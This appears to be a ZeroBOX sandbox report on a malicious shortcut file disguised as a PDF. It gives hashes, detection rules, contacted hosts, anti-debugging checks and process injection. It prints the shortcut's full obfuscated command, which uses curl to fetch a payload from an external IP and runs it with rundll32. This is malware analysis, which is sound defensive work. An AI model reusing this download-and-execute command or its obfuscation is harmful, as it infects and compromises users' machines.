Summary | ZeroBOX

KMWC.pdf.lnk

Generic Malware UPX GIF Format Lnk Format PE64 PE File DLL OS Processor Check AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 27, 2023, 10:52 a.m. Sept. 27, 2023, 10:54 a.m.
Size 2.1KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Tue Sep 26 02:14:49 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5 878ac1ae23f72d11af4239c8d86f3f65
SHA256 0b708fb7781d7585ffdac52ca595a05abe4cd69b13899800ab2754d6ce40535b
CRC32 0BAE6753
ssdeep 24:8aq2WJCnBc2LA8vd+/zlHS9lExlxIavi8532lKraimlR:8aq0i0MgHEjxqUrvm
Yara
  • Lnk_Format_Zero - LNK Format
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
skrgerona.com 172.67.193.129
IP Address Status Action
104.21.57.237 Active Moloch
135.125.177.95 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: '0x' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 0x
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'e"x"It' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: Ping request could not find host 0x. Please check the name and try again.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host 0x. Please check the name and try again.
console_handle: 0x00000007
1 1 0
suspicious_features Connection to IP address suspicious_request GET http://135.125.177.95/syK/OC
suspicious_features GET method with no useragent header suspicious_request GET http://skrgerona.com/
request GET http://135.125.177.95/syK/OC
request GET http://skrgerona.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3004
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\KMWC.pdf.lnk
cmdline "C:\Windows\System32\cmd.exe" /c 0x || ECHo 0x & PI"NG" 0x || C"url" htt"p:"//"1"35."1"25."1"77.9"5"/"sy"K"/OC" -o C:\Users\test22\AppData\Local\Temp\0x.log & PI"NG" -n 3 0x || rundll32 C:\Users\test22\AppData\Local\Temp\0x.log scab /k besogon728 & e"x"It '=sZVLMKeNQ
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 135.125.177.95
Process injection Process 2552 resumed a thread in remote process 2664
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2664
1 0 0